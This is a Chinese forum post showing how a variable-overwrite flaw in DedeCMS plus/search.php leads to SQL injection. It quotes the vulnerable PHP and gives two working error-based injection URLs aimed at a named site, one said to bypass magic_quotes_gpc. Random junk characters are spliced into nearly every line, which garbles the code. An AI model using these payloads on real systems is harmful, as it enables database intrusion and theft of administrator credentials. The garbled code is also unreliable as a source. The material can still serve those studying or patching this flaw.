微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
7 h( p' ~( Z# L: s$ R作者: c4rp3nt3r@0x50sec.org
( o9 k; e3 S( I' w& m8 j$ E! ?, eDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.$ J+ N% T5 k; A/ v
" R3 B* i4 ]: h& d: p- O
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
" @- o) ?1 e2 M0 f5 j
( v' C0 t' y ?# c============
3 h. g7 F2 @* V3 g2 l d' U* W* y2 b$ v- |
- z6 H" U& a' h8 E4 l( e. lDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.; [; L5 K- ]0 [7 P2 e g
: n% j& X3 R5 J
require_once(dirname(__FILE__).”/../include/common.inc.php”);, q0 s. s; w; d) D$ v0 I. u
require_once(DEDEINC.”/arc.searchview.class.php”);* p* z3 i: Y2 T8 C
: R B! G! L& K- Y1 |' d% y- _. ~" l
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
) ?" S. W6 T+ ^4 S. f$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
. s- |: a* H1 V, e3 _4 e/ a$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
. w$ }6 ]5 U; o# o2 T9 Z% p1 k$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;+ p/ Q. H4 R) } v) j# d# o
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
# `$ S4 ]$ A" `! \# e, l 7 Q% \( m" X+ D' w6 N' V- D) S
if(!isset($orderby)) $orderby=”;
# I0 r# Q' M/ G- gelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
8 A( h( M) F4 } v" d( \
0 @4 E0 o$ R; i: }
$ d8 Y- ^ R# Z) Iif(!isset($searchtype)) $searchtype = ‘titlekeyword’;
% E0 E, X) X6 `1 z( uelse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);. k: m5 m+ c) G* X/ R" F5 @
% z6 q4 E. M( \2 _if(!isset($keyword)){* W; l. S/ [" L1 P8 X+ v6 b
if(!isset($q)) $q = ”;
' \" m7 ]( l0 }, @& C $keyword=$q;
% Q. C; B2 ?& }+ P6 i6 L}
* A! }, j. H. ]+ F Y5 s ! m' L( O9 U, F/ w1 p
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));% Y: l% s" r( ^4 Q( I
# H* M9 v& P' E
//查找栏目信息
' j/ X1 A% T+ w2 D1 k7 Mif(empty($typeid))7 N0 _8 R1 o" r
{
7 j! D( w% u, E$ n: r7 d1 q3 } $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
! x1 L2 [) U# S/ @4 { Q8 A if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
" `. I, g: O" P5 H6 d7 \( z {
7 @5 o6 U% k7 X+ y $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);2 @6 K$ K; H: o: I5 ?; B4 a6 v4 A
fwrite($fp, “<”.”?php\r\n”);
: w& x; ^. C* y' c7 g" [ k $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
% w( N6 h* Q) }2 P $dsql->Execute();
' F8 x1 |8 Y0 |; I/ Y& w, X while($row = $dsql->GetArray())
2 R/ @3 Z, k% W4 z; X) d& c: H {; G+ w5 j) U+ z
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
2 i9 [8 i( S" m }
8 _& s6 t. [3 V. e1 N3 ] fwrite($fp, ‘?’.'>’);
- ]* k3 ?4 q! P! m7 O. a" F fclose($fp);
1 Q4 K9 y' v( i; t }( q+ D' M V4 k' P1 T
//引入栏目缓存并看关键字是否有相关栏目内容6 I/ r. |& J5 U( k9 a4 _
require_once($typenameCacheFile);
; q% o7 x3 Y4 I n" B9 W, v//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
2 k7 ~- h4 A' C& s) R* q6 e3 b5 f//
9 O0 G- ^! n1 ^0 `% {% g if(isset($typeArr) && is_array($typeArr))
9 C3 R8 m' Z* c j, M {
, Y% l! j2 P: Z' F foreach($typeArr as $id=>$typename)6 B* b% |! `8 K8 I# P( ^
{! \! P6 ]# b1 U% }1 z
, I' _. ^6 o/ s- l/ a+ U
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
* H+ k+ z, D2 I$ j if($keyword != $keywordn)" p1 B" t( O- O7 ^) A
{
0 h! C: I" C" x9 W/ Q& c b $keyword = $keywordn;# y, D+ w. t3 @6 N$ v
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设. F! J% p2 s7 e! W" S/ c" Q5 `7 v
break;& h8 K V# d% z4 v+ \. M
}
# V8 Q" b9 d; o, G6 h# R* S' L }/ @% V; V' H' j
}
& D$ o8 z" ]6 o* n' @8 `# b}
( Q7 F1 R- Q/ z- ` u然后plus/search.php文件下面定义了一个 Search类的对象 .
$ l6 t9 R8 {. y7 a2 Y4 ^4 e) e在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.4 `1 n# D. C' s( c6 E
$this->TypeLink = new TypeLink($typeid);3 `- @+ c: Z' w8 {6 A* _
% `% L6 _3 n6 J% MTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
0 `* k: n: N+ z' t . v. _( b( M2 }4 B F
class TypeLink1 C I. o9 @. H; v/ |
{ L# X4 p2 I0 q) ~% e, d
var $typeDir;
; T! r$ T3 \7 Q( a# A var $dsql;5 ?( b8 f; K$ _6 o+ X
var $TypeID;
' N4 I" P5 L# ^ var $baseDir;7 I3 V6 I8 I1 N7 [6 I
var $modDir;# S; I4 d; f. N( W& [+ x% n4 c: B
var $indexUrl;
. q: }8 S8 E* i: t var $indexName;
8 ~% Y P4 o0 @) T4 q var $TypeInfos;% v& _2 N! A9 _8 b- T8 m
var $SplitSymbol;( S+ A! a* w- i! w
var $valuePosition;0 S/ A9 s" I' }( O$ s d7 V
var $valuePositionName;" |" V3 |8 n2 E) k8 P
var $OptionArrayList;//构造函数///////; H5 m) a3 P8 K% k: \5 D
//php5构造函数
/ R- p- Z; j2 i6 c" A function __construct($typeid)
! {7 h9 Z$ A& a {
4 t; D! l l9 v- R5 a7 e $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
8 o0 `0 K) U% |- a $this->indexName = $GLOBALS['cfg_indexname'];. j$ D5 `* X& N* G' Z
$this->baseDir = $GLOBALS['cfg_basedir'];, Z3 [3 @1 O7 y+ c: C1 L% ?# O
$this->modDir = $GLOBALS['cfg_templets_dir'];
3 z( b" ]6 ?9 d# S, W $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];) s' H9 ^2 `2 F7 N' Y# M
$this->dsql = $GLOBALS['dsql'];3 N A. e1 ?( a) @
$this->TypeID = $typeid;
( g u- h x, ?' _1 y- I, H $this->valuePosition = ”;- j: V/ ]2 G9 ]( D
$this->valuePositionName = ”;
+ S4 I4 s0 B. E$ j: w2 H- t* f5 l $this->typeDir = ”;
: N( p8 K- Q# D* S2 `+ L4 `3 T $this->OptionArrayList = ”;
- ~: |3 q- d1 b# I+ l: a. s
. a$ ?! m& p; E# [1 i' | //载入类目信息2 r; i* O6 u( f& j: S- F' @! }
. B: Y4 T( F! j0 h. W# l2 p+ N <font color=”Red”>$query = “SELECT tp.*,ch.typename as
/ s1 C8 j" T& ?ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join3 k( x8 e; }5 f$ F
`#@__channeltype` ch
) _% K% K7 T3 Q* _ on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
% J) z/ N; [; W: e & c+ w5 p- Y0 w6 P
if($typeid > 0)
1 w8 o! K/ `# y2 d {! ~: p1 V+ m* Q# I; w
$this->TypeInfos = $this->dsql->GetOne($query);- h( [/ x3 L3 M& s' d. P0 Q) [
利用代码一 需要 即使magic_quotes_gpc = Off9 b2 E7 N) h# n
$ c5 r% _7 e/ ^# H. u4 r
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
9 R% c, I7 p8 [# Y; G6 `0 s( t 7 r; D- V; l. Q1 g7 O
这只是其中一个利用代码… Search 类的构造函数再往下* C2 V) K+ O& G! ]7 L7 x# C
& @% z$ m) o# }- X4 |
……省略
0 V& Z5 H( A, `. H' v3 q5 l5 S$this->TypeID = $typeid;* p& R$ K: W0 C+ M- N ^
……省略2 y' Y/ V* [1 V; }0 d3 f
if($this->TypeID==”0″){0 N- E$ S( W7 b( x! \# f$ A% C
$this->ChannelTypeid=1;
' o2 t/ j3 R: h$ w" { }else{
9 A) }, l3 b; L1 f1 z0 q4 ~ $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
; a! F3 W. K" f% b9 l* L- I! \//现在不鸡肋了吧亲…) y3 B+ }( z+ O3 _' i% h, k# d& e* @4 ~+ k
$this->ChannelTypeid=$row['channeltype'];# ` }! D. A2 e% p% b4 P0 s
( L/ n0 |% l4 d8 o' y: a3 A
}
) a# h* V, U% F$ [" C利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
. {; W4 a8 o- x/ R% ]% y ; Z; ?+ K8 }8 J) O& g& T
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title/ O& d, \9 a* d+ [ h
8 q9 l9 Q4 f9 f* z: j
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站# O; i ^. j+ p" p
|
发表于 2013-1-19 08:18:56
收藏
支持
反对